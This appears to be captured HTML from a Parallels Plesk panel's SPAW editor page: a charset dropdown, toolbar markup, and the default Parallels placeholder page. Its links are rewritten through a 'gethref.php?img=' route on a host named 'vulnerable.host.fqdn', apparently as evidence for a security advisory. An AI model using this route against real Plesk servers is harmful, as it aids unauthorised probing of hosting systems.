   <option value='ISO_8859-4'>ISO_8859-4</option>
   <option value='ISO_8859-4:1988'>ISO_8859-4:1988</option>
   <option value='ISO_8859-5'>ISO_8859-5</option>
   <option value='ISO_8859-5:1988'>ISO_8859-5:1988</option>
   <option value='ISO_8859-6'>ISO_8859-6</option>
   <option value='ISO_8859-6:1987'>ISO_8859-6:1987</option>
   <option value='ISO_8859-7'>ISO_8859-7</option>
   <option value='ISO_8859-7:1987'>ISO_8859-7:1987</option>
   <option value='ISO_8859-8'>ISO_8859-8</option>
   <option value='ISO_8859-8:1988'>ISO_8859-8:1988</option>
   <option value='ISO_8859-9'>ISO_8859-9</option>
   <option value='ISO_8859-9:1989'>ISO_8859-9:1989</option>
   <option value='JAVA'>JAVA</option>
   <option value='JIS_C6220-1969-RO'>JIS_C6220-1969-RO</option>
   <option value='JOHAB'>JOHAB</option>
   <option value='JP'>JP</option>
   <option value='KOI8-R'>KOI8-R</option>
   <option value='KOI8-RU'>KOI8-RU</option>
   <option value='KOI8-T'>KOI8-T</option>
   <option value='KOI8-U'>KOI8-U</option>
   <option value='L1'>L1</option>
   <option value='L2'>L2</option>
   <option value='L3'>L3</option>
   <option value='L4'>L4</option>
   <option value='L5'>L5</option>
   <option value='L6'>L6</option>
   <option value='L7'>L7</option>
   <option value='L8'>L8</option>
   <option value='LATIN1'>LATIN1</option>
   <option value='LATIN2'>LATIN2</option>
   <option value='LATIN3'>LATIN3</option>
   <option value='LATIN4'>LATIN4</option>
   <option value='LATIN5'>LATIN5</option>
   <option value='LATIN6'>LATIN6</option>
   <option value='LATIN7'>LATIN7</option>
   <option value='LATIN8'>LATIN8</option>
   <option value='MAC'>MAC</option>
   <option value='MACARABIC'>MACARABIC</option>
   <option value='MACCENTRALEUROPE'>MACCENTRALEUROPE</option>
   <option value='MACCROATIAN'>MACCROATIAN</option>
   <option value='MACCYRILLIC'>MACCYRILLIC</option>
   <option value='MACGREEK'>MACGREEK</option>
   <option value='MACHEBREW'>MACHEBREW</option>
   <option value='MACICELAND'>MACICELAND</option>
   <option value='MACINTOSH'>MACINTOSH</option>
   <option value='MACROMAN'>MACROMAN</option>
   <option value='MACROMANIA'>MACROMANIA</option>
   <option value='MACTURKISH'>MACTURKISH</option>
   <option value='MACUKRAINE'>MACUKRAINE</option>
   <option value='MS-ANSI'>MS-ANSI</option>
   <option value='MS-ARAB'>MS-ARAB</option>
   <option value='MS-CYRL'>MS-CYRL</option>
   <option value='MS-EE'>MS-EE</option>
   <option value='MS-GREEK'>MS-GREEK</option>
   <option value='MS-HEBR'>MS-HEBR</option>
   <option value='MS-TURK'>MS-TURK</option>
   <option value='MS_KANJI'>MS_KANJI</option>
   <option value='MacThai'>MacThai</option>
   <option value='MuleLao-1'>MuleLao-1</option>
   <option value='NEXTSTEP'>NEXTSTEP</option>
   <option value='R8'>R8</option>
   <option value='ROMAN8'>ROMAN8</option>
   <option value='SHIFT-JIS'>SHIFT-JIS</option>
   <option value='SHIFT_JIS'>SHIFT_JIS</option>
   <option value='SJIS'>SJIS</option>
   <option value='TCVN'>TCVN</option>
   <option value='TCVN-5712'>TCVN-5712</option>
   <option value='TCVN5712-1'>TCVN5712-1</option>
   <option value='TCVN5712-1:1993'>TCVN5712-1:1993</option>
   <option value='TIS-620'>TIS-620</option>
   <option value='TIS620'>TIS620</option>
   <option value='TIS620-0'>TIS620-0</option>
   <option value='TIS620.2529-1'>TIS620.2529-1</option>
   <option value='TIS620.2533-0'>TIS620.2533-0</option>
   <option value='UCS-2'>UCS-2</option>
   <option value='UCS-2-INTERNAL'>UCS-2-INTERNAL</option>
   <option value='UCS-2BE'>UCS-2BE</option>
   <option value='UCS-2LE'>UCS-2LE</option>
   <option value='UCS-4'>UCS-4</option>
   <option value='UCS-4-INTERNAL'>UCS-4-INTERNAL</option>
   <option value='UCS-4BE'>UCS-4BE</option>
   <option value='UCS-4LE'>UCS-4LE</option>
   <option value='UHC'>UHC</option>
   <option value='UNICODEBIG'>UNICODEBIG</option>
   <option value='UNICODELITTLE'>UNICODELITTLE</option>
   <option value='US'>US</option>
   <option value='US-ASCII'>US-ASCII</option>
   <option value='UTF-16'>UTF-16</option>
   <option value='UTF-16BE'>UTF-16BE</option>
   <option value='UTF-16LE'>UTF-16LE</option>
   <option value='UTF-32'>UTF-32</option>
   <option value='UTF-32BE'>UTF-32BE</option>
   <option value='UTF-32LE'>UTF-32LE</option>
   <option value='UTF-7'>UTF-7</option>
   <option value='UTF-8' SELECTED>UTF-8</option>
   <option value='VISCII'>VISCII</option>
   <option value='WINBALTRIM'>WINBALTRIM</option>
   <option value='WINDOWS-1250'>WINDOWS-1250</option>
   <option value='WINDOWS-1251'>WINDOWS-1251</option>
   <option value='WINDOWS-1252'>WINDOWS-1252</option>
   <option value='WINDOWS-1253'>WINDOWS-1253</option>
   <option value='WINDOWS-1254'>WINDOWS-1254</option>
   <option value='WINDOWS-1255'>WINDOWS-1255</option>
   <option value='WINDOWS-1256'>WINDOWS-1256</option>
   <option value='WINDOWS-1257'>WINDOWS-1257</option>
   <option value='WINDOWS-1258'>WINDOWS-1258</option>
</select>
</td>
               <td><DIV class="commonButton" id="bid-reload" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to reload the current file&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);reload_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_reload" id="buttonid-reload" type="button" onClick="Event.stop(event);reload_oC(document.forms[0]);;return false;">Reload</BUTTON><SPAN id="spanid-reload">Reload</SPAN></DIV> <span class="hint">(Note: any unsaved changes will be lost on reloading)</span></td>
           </tr>
       </table>
       <br/>
       <script language='JavaScript'>
<!--
var spaw_active_toolbar = true;
//-->
</script>
<script language="JavaScript" src="/spaw/spaw_script.js.php"></script>

<script language="JavaScript" src="/spaw/lib/themes/default/js/toolbar.js.php"></script><link rel="stylesheet" type="text/css" href="/spaw/lib/themes/default/css/toolbar.css"><table border="0" cellspacing="0" cellpadding="0" width="100%" height="300px"><tr><td id="SPAW_spaw2_toolbar_top_design" class="SPAW_default_toolbar" colspan="3"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td align="left" valign="top" class="SPAW_default_toolbar_top" nowrap="yes"><img id="SPAW_spaw2_tb_cut" alt="Cut" title="Cut" src="/spaw/lib/themes/default/img/tb_cut.gif" onClick="SPAW_cut_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_copy" alt="Copy" title="Copy" src="/spaw/lib/themes/default/img/tb_copy.gif" onClick="SPAW_copy_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_paste" alt="Paste" title="Paste" src="/spaw/lib/themes/default/img/tb_paste.gif" onClick="SPAW_paste_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_undo" alt="Undo" title="Undo" src="/spaw/lib/themes/default/img/tb_undo.gif" onClick="SPAW_undo_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img 
id="SPAW_spaw2_tb_redo" alt="Redo" title="Redo" src="/spaw/lib/themes/default/img/tb_redo.gif" onClick="SPAW_redo_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_hyperlink" alt="Hyperlink" title="Hyperlink" src="/spaw/lib/themes/default/img/tb_hyperlink.gif" onClick="SPAW_hyperlink_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_image_insert" alt="Insert image" title="Insert image" src="/spaw/lib/themes/default/img/tb_image_insert.gif" onClick="SPAW_image_insert_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_image_prop" alt="Image properties" title="Image properties" src="/spaw/lib/themes/default/img/tb_image_prop.gif" onClick="SPAW_image_prop_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_image_popup" alt="Image popup" title="Image popup" src="/spaw/lib/themes/default/img/tb_image_popup.gif" onClick="SPAW_image_popup_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img 
id="SPAW_spaw2_tb_hr" alt="Horizontal rule" title="Horizontal rule" src="/spaw/lib/themes/default/img/tb_hr.gif" onClick="SPAW_hr_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_table_create" alt="Create table" title="Create table" src="/spaw/lib/themes/default/img/tb_table_create.gif" onClick="SPAW_table_create_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_prop" alt="Table properties" title="Table properties" src="/spaw/lib/themes/default/img/tb_table_prop.gif" onClick="SPAW_table_prop_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_cell_prop" alt="Cell properties" title="Cell properties" src="/spaw/lib/themes/default/img/tb_table_cell_prop.gif" onClick="SPAW_table_cell_prop_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_row_insert" alt="Insert row" title="Insert row" src="/spaw/lib/themes/default/img/tb_table_row_insert.gif" onClick="SPAW_table_row_insert_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" 
onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_column_insert" alt="Insert column" title="Insert column" src="/spaw/lib/themes/default/img/tb_table_column_insert.gif" onClick="SPAW_table_column_insert_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_row_delete" alt="Delete row" title="Delete row" src="/spaw/lib/themes/default/img/tb_table_row_delete.gif" onClick="SPAW_table_row_delete_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_column_delete" alt="Delete column" title="Delete column" src="/spaw/lib/themes/default/img/tb_table_column_delete.gif" onClick="SPAW_table_column_delete_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_cell_merge_right" alt="Merge right" title="Merge right" src="/spaw/lib/themes/default/img/tb_table_cell_merge_right.gif" onClick="SPAW_table_cell_merge_right_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_cell_merge_down" alt="Merge down" title="Merge down" src="/spaw/lib/themes/default/img/tb_table_cell_merge_down.gif" onClick="SPAW_table_cell_merge_down_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" 
onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_cell_split_horizontal" alt="Split cell horizontally" title="Split cell horizontally" src="/spaw/lib/themes/default/img/tb_table_cell_split_horizontal.gif" onClick="SPAW_table_cell_split_horizontal_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_table_cell_split_vertical" alt="Split cell vertically" title="Split cell vertically" src="/spaw/lib/themes/default/img/tb_table_cell_split_vertical.gif" onClick="SPAW_table_cell_split_vertical_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"></td></tr><tr><td align="left" valign="top" class="SPAW_default_toolbar_top" nowrap="yes"><select size="1" id="SPAW_spaw2_tb_style" name="SPAW_spaw2_tb_style" align="absmiddle" class="SPAW_default_tb_input" onchange="SPAW_style_change('spaw2',this)" ><option>Style</option><option value="default">Normal</option></select><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_bold" alt="Bold" title="Bold" src="/spaw/lib/themes/default/img/tb_bold.gif" onClick="SPAW_bold_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_italic" alt="Italic" title="Italic" src="/spaw/lib/themes/default/img/tb_italic.gif" onClick="SPAW_italic_click('spaw2',this)" class="SPAW_default_tb_out" 
onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_underline" alt="Underline" title="Underline" src="/spaw/lib/themes/default/img/tb_underline.gif" onClick="SPAW_underline_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_strike" alt="" title="" src="/spaw/lib/themes/default/img/tb_strike.gif" onClick="SPAW_strike_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_ordered_list" alt="Ordered list" title="Ordered list" src="/spaw/lib/themes/default/img/tb_ordered_list.gif" onClick="SPAW_ordered_list_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_bulleted_list" alt="Bulleted list" title="Bulleted list" src="/spaw/lib/themes/default/img/tb_bulleted_list.gif" onClick="SPAW_bulleted_list_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_indent" alt="Indent" title="Indent" 
src="/spaw/lib/themes/default/img/tb_indent.gif" onClick="SPAW_indent_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_unindent" alt="Unindent" title="Unindent" src="/spaw/lib/themes/default/img/tb_unindent.gif" onClick="SPAW_unindent_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_left" alt="Left" title="Left" src="/spaw/lib/themes/default/img/tb_left.gif" onClick="SPAW_left_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_center" alt="Center" title="Center" src="/spaw/lib/themes/default/img/tb_center.gif" onClick="SPAW_center_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_right" alt="Right" title="Right" src="/spaw/lib/themes/default/img/tb_right.gif" onClick="SPAW_right_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_justify" alt="" title="" src="/spaw/lib/themes/default/img/tb_justify.gif" onClick="SPAW_justify_click('spaw2',this)" 
class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_fore_color" alt="Fore color" title="Fore color" src="/spaw/lib/themes/default/img/tb_fore_color.gif" onClick="SPAW_fore_color_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_bg_color" alt="Background color" title="Background color" src="/spaw/lib/themes/default/img/tb_bg_color.gif" onClick="SPAW_bg_color_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_superscript" alt="Superscript" title="Superscript" src="/spaw/lib/themes/default/img/tb_superscript.gif" onClick="SPAW_superscript_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_subscript" alt="Subscript" title="Subscript" src="/spaw/lib/themes/default/img/tb_subscript.gif" onClick="SPAW_subscript_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img 
id="SPAW_spaw2_tb_vertical_separator" alt="" src="/spaw/lib/themes/default/img/tb_vertical_separator.gif" unselectable="on"><img id="SPAW_spaw2_tb_cleanup" alt="HTML cleanup (remove styles)" title="HTML cleanup (remove styles)" src="/spaw/lib/themes/default/img/tb_cleanup.gif" onClick="SPAW_cleanup_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_toggle_borders" alt="Toggle borders" title="Toggle borders" src="/spaw/lib/themes/default/img/tb_toggle_borders.gif" onClick="SPAW_toggle_borders_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"></td></tr></table></td><td id="SPAW_spaw2_toolbar_top_html" class="SPAW_default_toolbar" colspan="3" style="display : none;"></td></tr><tr><td id="SPAW_spaw2_toolbar_left_design" valign="top" class="SPAW_default_toolbar" ></td><td id="SPAW_spaw2_toolbar_left_html" valign="top" class="SPAW_default_toolbar" style="display : none;"></td><td align="left" valign="top" width="100%" height="100%"><textarea id="spaw2" name="spaw2" style="width:100%; height:300px; display:none;" class="SPAW_default_editarea">
&lt;div class=&quot;page&quot;&gt;
&lt;div class=&quot;header clear&quot;&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
//&lt;![CDATA[
if (window.product_copyrights) { writeHeader(); }
//]]&gt;
&lt;/script&gt;
&lt;/div&gt;

&lt;div id=&quot;body&quot; class=&quot;clear&quot;&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;div class=&quot;globe&quot;&gt;&lt;/div&gt;
&lt;div class=&quot;welcome&quot;&gt;
&lt;h2&gt;Welcome to Parallels!&lt;/h2&gt;
&lt;p&gt;If you are seeing this message, the website for &lt;script type=&quot;text/javascript&quot;&gt;
//&lt;![CDATA[
document.write('&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://' + (location.hostname.indexOf(':')&gt;=0?'['+location.hostname+']':location.hostname) + '&quot;&gt;' + location.hostname + '&lt;/a&gt;');
//]]&gt;
&lt;/script&gt; is not available at this time.&lt;/p&gt;
&lt;p&gt;If you are the owner of this website, one of the following things may be occurring:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You have not put any content on your website.&lt;/li&gt;
&lt;li&gt;Your provider has suspended this page.&lt;/li&gt;
&lt;/ul&gt;
&lt;p class=&quot;hr&quot;&gt;Please login to &lt;script type=&quot;text/javascript&quot;&gt;
//&lt;![CDATA[
document.write('&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=https://' + (location.hostname.indexOf(':')&gt;=0?'['+location.hostname+']':location.hostname) + ':8443&quot;&gt;https://' + (location.hostname.indexOf(':')&gt;=0?'['+location.hostname+']':location.hostname) +':8443&lt;/a&gt;');
//]]&gt;
&lt;/script&gt; to receive instructions on setting up your website&lt;/p&gt;&lt;br /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;new-to-parallels&quot;&gt;
&lt;h3&gt;New to &lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/intro&quot;&gt;Parallels&lt;/a&gt;?&lt;/h3&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;p&gt;Parallels is a worldwide leader in virtualization and automation software that optimizes computing for consumers, businesses, and Cloud services providers across all major hardware, operating systems, and virtualization platforms.&lt;/p&gt;
&lt;p&gt;For the Cloud, Parallels automation and virtualization software enables cloud services providers to rapidly and profitably deliver the widest range of cloud services that small businesses want and need. Our software includes key building blocks of cloud service delivery - self service control panels, billing, cloud service provisioning and virtualization. We enable the delivery of all types of services that small businesses need - shared web hosting and web applications, messaging and collaboration services, virtualized infrastructure services and thousands of other applications.&lt;/p&gt;
&lt;p&gt;Our Automation products allow businesses to optimize their systems to maximize profit. Our Virtualization products allow personal computers to run several operating systems on one computer (like OSX and Windows) and for individual servers to function like many servers at once for creating cloud computing environments.&lt;/p&gt;
&lt;p&gt;This website was created using our Parallels Panel product. We offer a full line of Billing, Sitebuilder and cloud computing tools. Please visit &lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/intro&quot;&gt;www.parallels.com&lt;/a&gt; to find out more information.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Test pages&lt;/h3&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;p&gt;Parallels Plesk Panel provides several test pages that you can use for checking the scripting features, testing database connections and mail sending. Click an icon to see test pages for different scripts:&lt;/p&gt;&lt;br /&gt;
&lt;p class=&quot;center&quot;&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=test/aspnet/test.aspx&quot; class=&quot;icon&quot; id=&quot;aspnet&quot;&gt;&lt;span&gt;ASP.NET&lt;/span&gt;&lt;/a&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=test/python/test.py&quot; class=&quot;icon&quot; id=&quot;python&quot;&gt;&lt;span&gt;Python&lt;/span&gt;&lt;/a&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=test/php/test.php&quot; class=&quot;icon&quot; id=&quot;php&quot;&gt;&lt;span&gt;PHP&lt;/span&gt;&lt;/a&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=test/perl/test.pl&quot; class=&quot;icon&quot; id=&quot;perl&quot;&gt;&lt;span&gt;Perl&lt;/span&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;products&quot;&gt;
&lt;h3&gt;Consumer Products&lt;/h3&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;div class=&quot;column left&quot;&gt;
